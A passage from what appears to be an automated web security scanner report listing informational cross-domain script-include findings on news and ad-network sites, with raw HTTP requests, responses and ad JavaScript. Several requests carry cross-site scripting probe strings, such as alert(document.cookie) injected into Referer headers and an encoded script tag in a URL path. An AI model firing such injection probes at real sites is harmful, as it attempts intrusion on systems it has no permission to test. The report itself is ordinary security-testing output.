<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.128. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

http://smm.sitescout.com/tag.jsp?pid=52AF2E4&w=728&h=90&rnd=%r&cm=http://xads.zedo.com/ads2/c?a=882519;x=3584;g=172;c=1220000167,1220000167;i=0;n=1220;1=8;2=1;s=126;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=1075159;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/

Request

GET /bar/v16-401/c5/jsc/fm.js?c=167&a=0&f=&n=1220&r=13&d=14&q=&$=&s=126&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/&z=0.9975781855173409 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFad=0; FFcat=1220,101,9

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=242
Expires: Fri, 28 Jan 2011 14:52:34 GMT
Date: Fri, 28 Jan 2011 14:48:32 GMT
Connection: close
Content-Length: 1875

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=126;var zzPat='';var zzC
...[SNIP]...
f zzIdxClk == 'undefined' || zzIdxClk.length == 0) { var zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }

document.write('<script language="JavaScript" src="http://smm.sitescout.com/tag.jsp?pid=52AF2E4&w=728&h=90&rnd=%r&cm=http://xads.zedo.com/ads2/c?a=882519;x=3584;g=172;c=1220000167,1220000167;i=0;n=1220;1=8;2=1;s=126;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=1075159;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/"><\/script>
...[SNIP]...

18.129. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/fmr.js

Issue detail

The response dynamically includes the following script from another domain:

http://smm.sitescout.com/tag.jsp?pid=79C8ECB&w=300&h=250&rnd=%r&cm=http://xads.zedo.com/ads2/c?a=853584;x=2304;g=172;c=1220000101,1220000101;i=0;n=1220;1=8;2=1;s=69;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=990638;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/

Request

GET /bar/v16-401/c5/jsc/fmr.js?c=101&a=0&f=&n=1220&r=13&d=9&q=&$=&s=69&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&z=0.11480318708345294 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=84
Expires: Fri, 28 Jan 2011 14:15:59 GMT
Date: Fri, 28 Jan 2011 14:14:35 GMT
Connection: close
Content-Length: 1870

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=69;var zzPat='';var zzCust
...[SNIP]...
f zzIdxClk == 'undefined' || zzIdxClk.length == 0) { var zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }

document.write('<script language="JavaScript" src="http://smm.sitescout.com/tag.jsp?pid=79C8ECB&w=300&h=250&rnd=%r&cm=http://xads.zedo.com/ads2/c?a=853584;x=2304;g=172;c=1220000101,1220000101;i=0;n=1220;1=8;2=1;s=69;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=990638;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/"><\/script>
...[SNIP]...

18.130. http://common.onset.freedom.com/images/arrow_next.gif/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://common.onset.freedom.com
Path:	/images/arrow_next.gif/

Issue detail

The response dynamically includes the following script from another domain:

http://an.tacoda.net/an/15136/slf.js

Request

GET /images/arrow_next.gif/ HTTP/1.1
Host: common.onset.freedom.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE];

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 05:25:13 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n22 ( iad-agg-n20), ms iad-agg-n20 ( sfo-agg-n16), ms sfo-agg-n16 ( origin>CONN)
Cache-Control: max-age=30
Expires: Sat, 29 Jan 2011 05:25:43 GMT
Age: 0
Content-Length: 6565
Content-Type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15136/slf.js" type="text/javascript"></script>
...[SNIP]...

18.131. http://common.onset.freedom.com/images/arrow_prev.gif/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://common.onset.freedom.com
Path:	/images/arrow_prev.gif/

Issue detail

The response dynamically includes the following script from another domain:

http://an.tacoda.net/an/15136/slf.js

Request

GET /images/arrow_prev.gif/ HTTP/1.1
Host: common.onset.freedom.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE];

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 05:25:13 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n22 ( iad-agg-n7), ms iad-agg-n7 ( sfo-agg-n8), ms sfo-agg-n8 ( origin>CONN)
Cache-Control: max-age=30
Expires: Sat, 29 Jan 2011 05:25:43 GMT
Age: 0
Content-Length: 6565
Content-Type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15136/slf.js" type="text/javascript"></script>
...[SNIP]...

18.132. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

http://a.collective-media.net/adj/cm.rev_bostonherald/;sz=300x250;ord=' + Math.random() + '?

Request

Response

18.133. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience;sz=728x90;ord=' + Math.random() + '?

Request

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'$951:realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,14:951,2,14:826,187,9:951,2,9:951,11,14:951,7,9:951,7,14:826,187,7:951,7,7:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=7:0:12:5:2:6:3:1:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:4,26,1:2,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:2,26,1;expires=Sun, 27 Feb 2011 22:39:45 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=155
Expires: Fri, 28 Jan 2011 22:42:20 GMT
Date: Fri, 28 Jan 2011 22:39:45 GMT
Connection: close
Content-Length: 2306

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='realmedia728
...[SNIP]...
</span>")
document.write('<script language="JavaScript" src="http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience;sz=728x90;ord=' + Math.random() + '?" type="text/javascript"><\/script>
...[SNIP]...

18.134. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

http://media.fastclick.net/w/get.media?sid=54393&m=6&tp=8&d=j&t=n

Request

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'$951:appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,9:951,2,9:951,7,9:826,187,14:951,11,14:951,2,14:951,7,14:826,187,7:951,7,7:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=17:9:7:8:3:0:3:1:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:2,26,1:0,26,1;expires=Sun, 27 Feb 2011 22:56:10 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=32
Expires: Fri, 28 Jan 2011 22:56:42 GMT
Date: Fri, 28 Jan 2011 22:56:10 GMT
Connection: close
Content-Length: 2304

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='appnexus300x
...[SNIP]...
</span>")
document.write('<script language="javascript" src="http://media.fastclick.net/w/get.media?sid=54393&m=6&tp=8&d=j&t=n"><\/script>
...[SNIP]...

18.135. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience;sz=300x250;ord=' + Math.random() + '?

Request

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777,2#776116|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1;expires=Sun, 27 Feb 2011 21:57:31 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,187,9:951,2,9:951,7,9:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=249
Expires: Fri, 28 Jan 2011 22:01:40 GMT
Date: Fri, 28 Jan 2011 21:57:31 GMT
Connection: close
Content-Length: 2167

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='';var zzCusto
...[SNIP]...
</span>")
document.write('<script language="JavaScript" src="http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience;sz=300x250;ord=' + Math.random() + '?" type="text/javascript"><\/script>
...[SNIP]...

18.136. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

http://content.pulse360.com/EF949BBC-E1FB-11DF-83A0-DE09EDADD848

Request

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294,2#776116|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1;expires=Sun, 27 Feb 2011 21:57:32 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,187,9:951,7,9:951,2,9:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:1:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=170
Expires: Fri, 28 Jan 2011 22:00:22 GMT
Date: Fri, 28 Jan 2011 21:57:32 GMT
Connection: close
Content-Length: 2108

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='';var zzCusto
...[SNIP]...
</span>")
document.write('<script src="http://content.pulse360.com/EF949BBC-E1FB-11DF-83A0-DE09EDADD848" type="text/javascript"><\/script>
...[SNIP]...

18.137. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

http://ib.adnxs.com/ttj?id=57040&pubclick=http://yads.zedo.com/ads2/c%3Fa=775740%3Bn=951%3Bx=2304%3Bc=951000002,951000002%3Bg=172%3Bi=6%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=6%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=2%3Bss=2%3Bsi=6%3Bse=1%3Bk=&cb=' + Math.random() + '

Request

Response

18.138. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The response dynamically includes the following script from another domain:

http://media.fastclick.net/w/get.media?sid=54393&tp=5&d=j&t=n

Request

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'$951:realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,14:951,11,14:951,2,14:826,187,9:951,2,9:951,7,9:951,7,14:826,187,7:951,7,7:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=8:3:0:12:5:6:3:1:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046,131022|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1;expires=Sun, 27 Feb 2011 22:43:52 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=66
Expires: Fri, 28 Jan 2011 22:44:58 GMT
Date: Fri, 28 Jan 2011 22:43:52 GMT
Connection: close
Content-Length: 2239

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='realmedia728
...[SNIP]...
</span>")
document.write('<script language="javascript" src="http://media.fastclick.net/w/get.media?sid=54393&tp=5&d=j&t=n"><\/script>
...[SNIP]...

18.139. http://digg.com/submit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn1.diggstatic.com/js/common/fb_loader.4050a241.js
http://cdn2.diggstatic.com/js/lib.b29284a6.js
http://cdn3.diggstatic.com/js/Omniture/omniture.6c48dd51.js

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:25:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1163912321857224960%3A171; expires=Sun, 30-Jan-2011 05:25:28 GMT; path=/; domain=digg.com
Set-Cookie: d=f148f02d29ba659b182b1c54e053268c0b2309202a4d0c9ea1fb51eef766d1ad; expires=Thu, 28-Jan-2021 15:33:08 GMT; path=/; domain=.digg.com
X-Digg-Time: D=27902 10.2.128.186
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7633

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</div>
<script src="http://cdn1.diggstatic.com/js/common/fb_loader.4050a241.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://cdn2.diggstatic.com/js/lib.b29284a6.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn3.diggstatic.com/js/Omniture/omniture.6c48dd51.js" type="text/javascript"></script>
...[SNIP]...

18.140. http://events.cbs6albany.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

Response

18.141. http://events.cbs6albany.com/%3F376e5%2522%253E%253Cscript%253Ealert(1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/%3F376e5%2522%253E%253Cscript%253Ealert(1

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617

Request

GET /%3F376e5%2522%253E%253Cscript%253Ealert(1 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
